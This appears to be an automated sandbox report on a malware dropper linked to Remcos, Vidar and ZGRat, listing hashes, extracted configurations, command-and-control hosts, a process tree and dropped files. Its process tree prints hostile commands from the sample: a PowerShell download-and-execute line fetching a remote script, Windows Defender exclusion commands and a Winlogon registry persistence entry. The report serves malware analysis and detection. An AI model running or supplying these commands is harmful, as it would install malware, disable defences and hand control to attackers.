remcos | 0c951f58a23cd2c9bdccb727d41e33e740344af36d91419907ce016977b2a62d

max time kernel
4s
max time network
18s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
11-02-2024 08:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Score

10^/10

remcos vidar zgrat 1827 go!!!rat stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://houssagynecologue.com/assets/js/debug2.ps1

Extracted

Family

vidar

Version

55.7

Botnet

1827

https://t.me/deadftx

https://www.ultimate-guitar.com/u/smbfupkuhrgc1

http://116.202.2.1:80

Attributes

profile_id
1827

Extracted

Family

remcos

Botnet

Go!!!

dangerous.hopto.org:2404

dangerous.hopto.org:2602

91.92.242.184:2602

91.92.242.184:2404

Attributes

audio_folder
??????????? ??????
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
taskhost.exe
copy_folder
System32
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
true
install_path
%AppData%
keylog_crypt
true
keylog_file
tapiui.dat
keylog_flag
false
keylog_folder
System32
mouse_option
false
mutex
???-LDKG91
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
?????????
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Detect ZGRat V1 28 IoCs

resource	yara_rule
behavioral1/memory/376-155-0x0000000004CE0000-0x0000000004DDE000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-158-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-159-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-161-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-163-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-165-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-167-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-171-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-184-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-186-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-189-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-191-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-210-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-214-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-217-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-233-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-244-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-253-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-256-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-262-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-282-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-284-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-295-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-297-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-300-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-240-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/376-220-0x0000000004CE0000-0x0000000004DD7000-memory.dmp	family_zgrat_v1
behavioral1/memory/4068-352-0x0000000005940000-0x0000000005B48000-memory.dmp	family_zgrat_v1

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe

Executes dropped EXE 3 IoCs

pid	Process
996	build.exe
808	lumma123142124.exe
5008	Winlock.exe

Loads dropped DLL 1 IoCs

pid	Process
5008	Winlock.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
10	raw.githubusercontent.com
43	drive.google.com
44	drive.google.com
8	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3736	4928	WerFault.exe	89

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4196	4363463463464363463463463.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 4196 wrote to memory of 996	4196	4363463463464363463463463.exe	85
PID 4196 wrote to memory of 996	4196	4363463463464363463463463.exe	85
PID 4196 wrote to memory of 996	4196	4363463463464363463463463.exe	85
PID 4196 wrote to memory of 808	4196	4363463463464363463463463.exe	86
PID 4196 wrote to memory of 808	4196	4363463463464363463463463.exe	86
PID 4196 wrote to memory of 808	4196	4363463463464363463463463.exe	86
PID 4196 wrote to memory of 5008	4196	4363463463464363463463463.exe	88
PID 4196 wrote to memory of 5008	4196	4363463463464363463463463.exe	88
PID 4196 wrote to memory of 5008	4196	4363463463464363463463463.exe	88

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4196
- C:\Users\Admin\AppData\Local\Temp\Files\build.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\build.exe"
  2⤵
  - Executes dropped EXE
  PID:996
- C:\Users\Admin\AppData\Local\Temp\Files\lumma123142124.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\lumma123142124.exe"
  2⤵
  - Executes dropped EXE
  PID:808
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4928
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 1200
      4⤵
      Program crash
      PID:3736
- C:\Users\Admin\AppData\Local\Temp\Files\Winlock.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Winlock.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5008
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /V/K reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\Windows\system32\drivers\Bbm33bf3a3Ebibs3KbEbw3Ibb3.exe" /f
    3⤵
    PID:3488
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\Windows\system32\drivers\Bbm33bf3a3Ebibs3KbEbw3Ibb3.exe" /f
      4⤵
      PID:2184
- C:\Users\Admin\AppData\Local\Temp\Files\hncc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\hncc.exe"
  2⤵
  PID:376
- C:\Users\Admin\AppData\Local\Temp\Files\FirstZ.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\FirstZ.exe"
  2⤵
  PID:116
- C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe"
  2⤵
  PID:4432
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe'; Add-MpPreference -ExclusionProcess 'wefhrf'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"
    3⤵
    PID:2184
- C:\Users\Admin\AppData\Local\Temp\Files\cayV0Deo9jSt417.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cayV0Deo9jSt417.exe"
  2⤵
  PID:596
- - C:\Windows\SysWOW64\clip.exe
    "C:\Windows\SysWOW64\clip.exe"
    3⤵
    PID:3160
  - - C:\Users\Admin\AppData\Roaming\System32\taskhost.exe
      "C:\Users\Admin\AppData\Roaming\System32\taskhost.exe"
      4⤵
      PID:4340
- C:\Users\Admin\AppData\Local\Temp\Files\sqlcmd.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\sqlcmd.exe"
  2⤵
  PID:2764
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://houssagynecologue.com/assets/js/debug2.ps1')"
    3⤵
    PID:4424
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\Files\sqlcmd.exe" >> NUL
    3⤵
    PID:4876
- C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"
  2⤵
  PID:4068
- C:\Users\Admin\AppData\Local\Temp\Files\hv.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"
  2⤵
  PID:4376

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:2292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://houssagynecologue.com/assets/js/debug2.ps1')
1⤵
PID:1696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4928 -ip 4928
1⤵
PID:3340

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\Encryption.mfx

Filesize
10KB

MD5
f54e708d3fc6667e71e6ae69215275c0

SHA1
5c8af159419e768608fc8b787362296ac381c3f5

SHA256
57be6725dabfe6e192f4a121a46cff05b95bb3c9a68c7cc3cc0f9af931005693

SHA512
8ef86e409b9a76b51ea07a0f4ce79e8f85252f71aa4fb5512088328db31c4d7770d510dcbeedfe086b0cc0808511687224900256944fd762af644638732892f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\Get.mfx

Filesize
340KB

MD5
c61fd0d847df328fd6f0a98e4f030f41

SHA1
c3d8c3493818c44723e1466b411a3b5e188d823f

SHA256
791e717345991c4bf183c6450667498a89b59c4e8a5abb52e2751fde63d3ad43

SHA512
72cb1345af5834cbc89c9244c935cd62ea7a9d19d34a39eb6d69c32bd10302c1c0a9c0573278e6424bee1f0a771ea46e7fb907c630742dcfc6bbb572b393970e

Download Submit
C:\Users\Admin\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\GetKillProcess.mfx

Filesize
360KB

MD5
099360222ca4f2631a039e99f2d620e5

SHA1
64437db0fea66b57e4fb5b746463db86c46a746f

SHA256
4ef8833efd0447806acf51f6609b30bbf4f946b47c300992408fa9a06ec24b10

SHA512
dfb59385b6c9b1f0d04ef8d079854c9f8bdf36dba43678053e5dc37de8b138ccd174eefb86a8954cc103b4c52dc54402699944b0e3b361b5f8256c734aa0c5d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\InternetConnectionOperations.mfx

Filesize
115KB

MD5
715f47554c73bb77ff0e463592462cef

SHA1
75671893da8c786d4fc34ae122fb3754c92f85ff

SHA256
32a6843b7a32e69aa2cc0decae3b7ea322bb20a7d9834573141030f87d8c54e2

SHA512
ee216a470e3968db41ab1b4d1e6e92237d2229cb3ce746da646d0ba7852e3cf81da24c80d911261a3f9d7b54e5d7a9c3a36b9ca8fcb008ff2f247230e00d1c04

Download Submit
C:\Users\Admin\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\KcSyso.mfx

Filesize
24KB

MD5
5a360a702ca0e4c6929d63f44d80aa9a

SHA1
c1ffee5e1e7e790112e524833881aff097482e38

SHA256
7bab74b8686d54e2e4d882d13c50ae7173fa664f8b6829acca8839ad623240bb

SHA512
87ec0ee3e48bb1d16a380d87cd5414c4f1edd3dbc534599ec4184926745e47157cca50570b83b201f43854a50fc7f4b9e09572715cd2527d884a378d73e4f9cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\Registry2.mfx

Filesize
28KB

MD5
31a275222d4a7fdb261d677cd45351ee

SHA1
de02aefe60242e3cdc93bfb1082defa68901bacf

SHA256
48d5965b2347cfda307f87667f46ef1fcc698b2842bf8cb4669d96c44f2017f6

SHA512
cfd99c2cd4f0fad6ec7defb2a66f62d86db5d6e374a94129ab764e2942ec33aff58994ed853843dafee40d698b37732fd46f1a56f34223258690c7d8fa89c384

Download Submit
C:\Users\Admin\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\RunInConsole.mfx

Filesize
113KB

MD5
e31137fadc4e75bacab2258a5d295a2d

SHA1
c9b75af685b6fd724b5059b9666888f0985d4d08

SHA256
e4e2e4a9a6dbfa7ac537ae39c8b43040b752d90d409bc1c1d09c03d8e195bcd0

SHA512
8eceb18350e086b08f6c5e2d61df8f3135a37b640c797ece1499e9536621d4656b608470c34bc05c58e3e7e379182431733508e71c5d5259e6921350406e1ae3

Download Submit
C:\Users\Admin\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\ctrlx.mfx

Filesize
44KB

MD5
ceb8b2e522d0aaaecdf69b3bcc89a530

SHA1
c1cf769a96a9612f7fd0c1965413f4a57e4907e1

SHA256
3407eb12f6bacec5ebd4df96ff3fd34741a3919fd46c2ec527364c5f1e753a65

SHA512
3c46743c635eb96351e6a82490cececb24e6a104433c962f263ec01cf78fa9747d4f56d05c3085c0a18eff7c180b145df5e8e74bc008fe2f617f7f4c24be0331

Download Submit
C:\Users\Admin\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\kcedit.mfx

Filesize
32KB

MD5
b00898b2cf3f8bfc98d782fba8b5c72b

SHA1
4851163436946fd145048104bd1a47d34840fc3d

SHA256
48bb645990f1a703a1e9fdad3c765824db23c8f5e25b388c82dd25cb83fe31d0

SHA512
0ed0c44e3f0f147655ebf0b1a2627c7eff895342a09c0410405b9b8c5dfa9c1da588731873ec2c03259a89a58b9c4c7cbd5119c5e4952e8d024aaef36e7b6626

Download Submit
C:\Users\Admin\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\kcfile.mfx

Filesize
116KB

MD5
fe2b4c6a45ce244f1c40f730008465c9

SHA1
9dfd41a915c19a4520a3024e9133e9a24e61779f

SHA256
7daa995fbf72b941859177b08b2785dc107f1a3deb99f6ab4c675d2b0f03a06b

SHA512
caf9e1bba2a5560b73c47d116f0f0f016a88f54e5397499fcd5b8a648bf676b93eb255a32fe7f71f0462b481737eba2d01cb9e790b75897c44ea741d73867b39

Download Submit
C:\Users\Admin\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\kcwctrl.mfx

Filesize
79KB

MD5
2c34e977f898ab60eddb72075c4be223

SHA1
adf883dd06e5ae340a03e6c22a56a4c0caf909ea

SHA256
a0ada42e3a4760097c1c2f98905f12b19de47159543aa21e1c604dbcac7337f2

SHA512
73402857d09e5a0e8049bb7adf3bbfdfc9ac65966217751cbf6db2bf532aa3f92ffc3a1a5dcda638e83d6ede29ebe6e760cbad74d27aa6fa006c9296607d3c37

Download Submit
C:\Users\Admin\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\mmf2d3d11.dll

Filesize
547KB

MD5
34f59e6e9dc838d4fb2e66572895b743

SHA1
1fc52b466a658e8be485e8db4bfa4616229089c3

SHA256
95374f7a8baf4aa4851a6cab31f04cb2450cec3837dacfdc9456e37b0b6c1496

SHA512
e3fad9bf9811f93c9150b9f39e310086d02b381cecda40bc16b4653f66c62209beeb530dd1d360a7444f90da206dd8d23990756ba8987a35117c6860599cc9ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\mmf2d3d9.dll

Filesize
1.1MB

MD5
72bb9180f8905c0da95566b778cdac5e

SHA1
e96145e8120514092b35f67f1f120b958997f921

SHA256
3cde7a9181ab63a42cd3535d279d0ab1397b7b78fa3ddddef832757ab2024101

SHA512
c2c8d8c74c53a78545e69f27a7fe1a6d1291888158962e93e16e6ec9950f86e74c68bd2eb50d04db0bff58e8dc93455aa384245991c5afe34abee36fef53710f

Download Submit
C:\Users\Admin\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\mmfs2.dll

Filesize
509KB

MD5
98f647d1ed220e1d715aed9dcf69f387

SHA1
d1d9f5361672553a394bee9afe1d30814dd0ac53

SHA256
3a288448e88a296b2bceeaf093e76a22e3083e937a3c4efeb6a61565ca7e35df

SHA512
e950658b0afdad722a9f243bb8ae7fbc1c541dd0513379ef9e1d99becf8b31b4098c6789204baf3f15ea26f43af665edaa9799a6617373009def81bb20f02a06

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\FirstZ.exe

Filesize
192KB

MD5
c6068f6ebb95d3dabdc3a0cfac4219c0

SHA1
4cdbebeffe54453afb6a714d6bc8e460bae7a39f

SHA256
6e01e5c82a77461bdf2598db671ef8e12c5f84df6b7bfbabc138739f79184126

SHA512
e7af7e6254b03ab8dd42db4b8b22a4cc2abcac97db86b857a9911798017922b1d0ec1e2008f752ff6d4dfb85844b7aed907c55a98b5792e46ffb8d47accb7aaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\FirstZ.exe

Filesize
128KB

MD5
434599c092557f19ef4622f566fb23f6

SHA1
5aa87f70b3e63b951d34abdc93c92775771f505b

SHA256
670134ba47fe7c843c6e233862909583c459f86c249623748ea45e1baa9bac4c

SHA512
6eacef9e77ec4f60c72ec8c7bb2c60f72896e36233f83ff6bb185092b8a49454bd0c000a140d74a196c510de1662d2159f494b0bfd992c29fa190b9ebafa6ddf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\FirstZ.exe

Filesize
64KB

MD5
4170409a428cda07f18e409756b246cb

SHA1
f62f985c25bb8fa739665ad8fc213e5a7e56e9a2

SHA256
ef263cd3950e5961dd168bf9408a3b6230f867b29e6960d1f97a9c57434fdc86

SHA512
2293163f0de692d5d59f4008ae4d5a259fa84760ff2c17c5aa362b0bdd0de74e1155e309b4ab184c6363ece07179c5a23fad3ce8fe797e6ea896a6a18449535d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Winlock.exe

Filesize
3.0MB

MD5
18563c62462e92e3c81dfe737e3a8997

SHA1
46b7af31847f18e886a33779dc53199776d0b666

SHA256
3e84a1296556efb107c12d4b936b0e1a1a7a5a70d6ecd3ed7ecff79e4b39bd54

SHA512
4d835fd33da52baad823017c4af56152e3e9930e885de9587ca6661233cd238ccb326c984bbe3d5c850d317b18bffccf179e0578e0936b2df6dfd656afbd4319

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\build.exe

Filesize
274KB

MD5
39e947318bd7c04280e9266f4b6c0a35

SHA1
1568c064c8aa24f17549fbbff895fc7eae574dcd

SHA256
ce3c6cc7e3d80c26246bb01b910992d8c77b1c3f30ec28b79346f15224a3c746

SHA512
05361abdf59148b763bb5705587a01d8309a5db3b6a8006b70793459af8e48db8c801d41917af9d96e2b74f154a58822d24c4f7585a84f2c5ec43d2f39fb1db2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\cayV0Deo9jSt417.exe

Filesize
704KB

MD5
0a7855765fa71c06cde380f04c758134

SHA1
f427a0a7c38b81afec231a5b319330f0acda5219

SHA256
94ed68fbd5f1fad1395612e8f645961259392f2d02233115742a1bdede926871

SHA512
88fad5d349607b0457aa717039fcf44d84189232878b0d911a1a8e6b5edb6263f790b31d92c15a15f8acf8f8ec70c7e653f0039574404e437c501619016c615a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\cayV0Deo9jSt417.exe

Filesize
958KB

MD5
aa3cdd5145d9fb980c061d2d8653fa8d

SHA1
de696701275b01ddad5461e269d7ab15b7466d6a

SHA256
41376827ba300374727d29048920ca2a2d9f20b929e964098181981581e47af2

SHA512
4be32b5e9eaffa8d3f4cce515717faa6259373e8dbd258b9ebc2534fd0b62aaa7043093204e43627983fe332f63d8f998a90dc1cbb74f54a18c55f67e42a8a32

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\cayV0Deo9jSt417.exe

Filesize
640KB

MD5
39b294233f5510385fefc194153b2f9d

SHA1
2cf1f8c810191d7560a3d497537f5ab221746791

SHA256
b2ab2cff4759d11bf6e38b32518bd006256a8897a5cb59364680d0e8c2f04140

SHA512
2ec8cebb99081e6ddab3aea84d135358fcf9c4c5838ab9647a3fb99783936a0981e01d3950b34c78d3a055596404163bdd4c4b5df6d7600f0cda62c995cf6e6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe

Filesize
832KB

MD5
e81c739b5bc12e4989f508e6e128d2ad

SHA1
7b15ab941436361f1abfcdbc394df8f06e30eceb

SHA256
c1a8d530128c40919d1af0db2953381897853cbbe2576b5cbe362373d4b21f3a

SHA512
8c6f9173a0ca8e8a8d0b9c77d81b02c5b0b2b91f2a416191060e5238e90c49ef703f4af805c101ff265086ea35c1399d52d19afd5a395c5eb001a97f87e208db

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe

Filesize
320KB

MD5
f9da65bff1e986a1385c8b8273d5818e

SHA1
a2bf9762462d309ae0a6935fdba762b62df693c8

SHA256
bd317c1d01990e8c44aaac4244c25e73764a225e4681476c03c184edb9d83946

SHA512
c14959e3b0d88ab3ba4168ef0cffca5026131dd4e007056584f7c868aae8f8e7193528459bf8f266cf949f6fc54f7b2feae10a6a0a0b8e6ba8b04bf2d3b9d4a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe

Filesize
256KB

MD5
535eb626bc40309572305eeab764dcaa

SHA1
da45e47be2e7f1981d146e40c3eb2371d2b1134a

SHA256
e0bb1b8e6ec15ca8b0990846863e46f2842ff9d23c5d02bdbabdbea178264489

SHA512
da1eb8c6246f03a6521182d4a9bcfd0eacc23b62bfff5fc6ea5918aa9a35283fbbf0612bff5850076f9268b0446b3bf2f7f9b2b1f463f6c51fd9e597dab2f704

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\hncc.exe

Filesize
1.1MB

MD5
c227e22771466226949f8c53af85465c

SHA1
725a95a7ef0a2b5cccaffe3d8bc1ff12190794d0

SHA256
440a17e8dbd0bfad5f1587fe8c758e9461106eb7b04235477d4b7cab156fcfbf

SHA512
0a00b6980928ac3984cf512d28c7801050b851b8552cc31b0ad2740873b16b6d64332ce68d8f2981356b1c0e9c22f65d95a42867e9f3547ec0c7fe5b80586aa4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\hv.exe

Filesize
1.4MB

MD5
2a55f2ffb2040db40e548018e39ecad1

SHA1
af14a7b6a9020414ae5f02f57aba3d5da12ae7b9

SHA256
c39f80988bffc883e3f34e2e6b3f056b1e56f231005268dc101bd829321ba6ce

SHA512
79ac03c9687972aab8d7406c3a603b90b3cf8d7c205999f25e3cb4bed3302702397968a11ee3a6489f837c1ec38b25095f963d4ecc511056ed3fcc3ae31b9af7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\hv.exe

Filesize
704KB

MD5
8bfc89b873dd9402c065b35837455f76

SHA1
a9318d24a24b8fce591c2cfffe9d3f1f9faf4ee2

SHA256
91a492e526dcf750713f664cbbb82f17dab52cdfddb72da2ea18de756c81d5b4

SHA512
4c26b63b75b1a5bbc28845ac960d4b7d7e72c8bb53b34fa9acc27720a81bc42e07a3851df5ba36bd0a5fa1ee64c1f69b625da9876ac22f231ecf1c03405e02e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\hv.exe

Filesize
1.2MB

MD5
3c25f40b14e90a671d1b0a6cb87f9dc7

SHA1
955ce0fa6a5931057eda34eebd38d178fe2f50a5

SHA256
9a8929376f0f16d3778428bf5e114fb3c320108f12c891dbb1e2f73ab0638844

SHA512
e1c9f32de5920effa9e6b545a8b84110b229de8710a8a3f45d7fec767adce9542b25d4f29bc26b6808a80dd72a694fb1f6b5bd77d0f8a7f2b99358c63a4c302f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\lumma123142124.exe

Filesize
600KB

MD5
cad41f50c144c92747eee506f5c69a05

SHA1
f08fd5ec92fd22ba613776199182b3b1edb4f7b2

SHA256
1ac5eed2f7fc98b3d247240faa30f221f5692b15ea5b5c1eba3390709cb025c6

SHA512
64b89f3a3b667cd81f33985db9c76ffd0bb716ce8ed93f97c24d3c20e7236d91d02af9371a26d41f55b564702bd1f6fd7489055868fcd1610c04beb79ae8c045

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\sqlcmd.exe

Filesize
150KB

MD5
64d5a984c5d0fd74b729be5b52c00389

SHA1
4c5478bd5fd7b58b9c89cbf375ef0005f6807e2f

SHA256
daba6aa332fac84534abce432c65388b1be0b2eb5cb19ac9220d519136a343d7

SHA512
87f290f55d3096ac48c82e192b49b9ff3eefa4f3c2ac6592d38e084e8bd8fc7bdc24169265d0cbce20ad6d0767aef521215b33a7cfa763fe73d3adf9184afcbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe

Filesize
15KB

MD5
2ca4bd5f5fece4e6def53720f2a7a9bb

SHA1
04b49bb6f0b9600782d091eaa5d54963ff6d7e10

SHA256
ab55d9b53f755a232a7968d7b5fcb6ca56fc0f59e72b1e60ab8624a0ee6be8c1

SHA512
3e9e5c9793b4880990fbc8ab38f8a28b38a7493adb3ee1727e5ce0f8377348142705533f672356152a895694800c82517c71f2070c0dff08b73555214a165481

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_meix0jzn.2hb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\System32\taskhost.exe

Filesize
24KB

MD5
e40cb198ebcd20cd16739f670d4d7b74

SHA1
e898a3b321bd6734c5a676382b5c0dfd42be377d

SHA256
6cdc8d3c147dcf7253c0fb7bb552b4ae918aba4058cc072a2320a7297d4fbed7

SHA512
1e5a68b2ae30c7d16a0a74807fa069be2d1b8adcfcbcde777217b9420a987196af13fb05177e476157029a1f7916e6948a1286cdb8957cdd142756da3c42beef

Download Submit
memory/376-210-0x0000000004CE0000-0x0000000004DD7000-memory.dmp

Filesize
988KB

Download
memory/376-443-0x0000000004BD0000-0x0000000004BE0000-memory.dmp

Filesize
64KB

Download
memory/376-220-0x0000000004CE0000-0x0000000004DD7000-memory.dmp

Filesize
988KB

Download
memory/376-149-0x0000000000130000-0x000000000024A000-memory.dmp

Filesize
1.1MB

Download
memory/376-150-0x0000000075220000-0x00000000759D0000-memory.dmp

Filesize
7.7MB

Download
memory/376-400-0x0000000075220000-0x00000000759D0000-memory.dmp

Filesize
7.7MB

Download
memory/376-240-0x0000000004CE0000-0x0000000004DD7000-memory.dmp

Filesize
988KB

Download
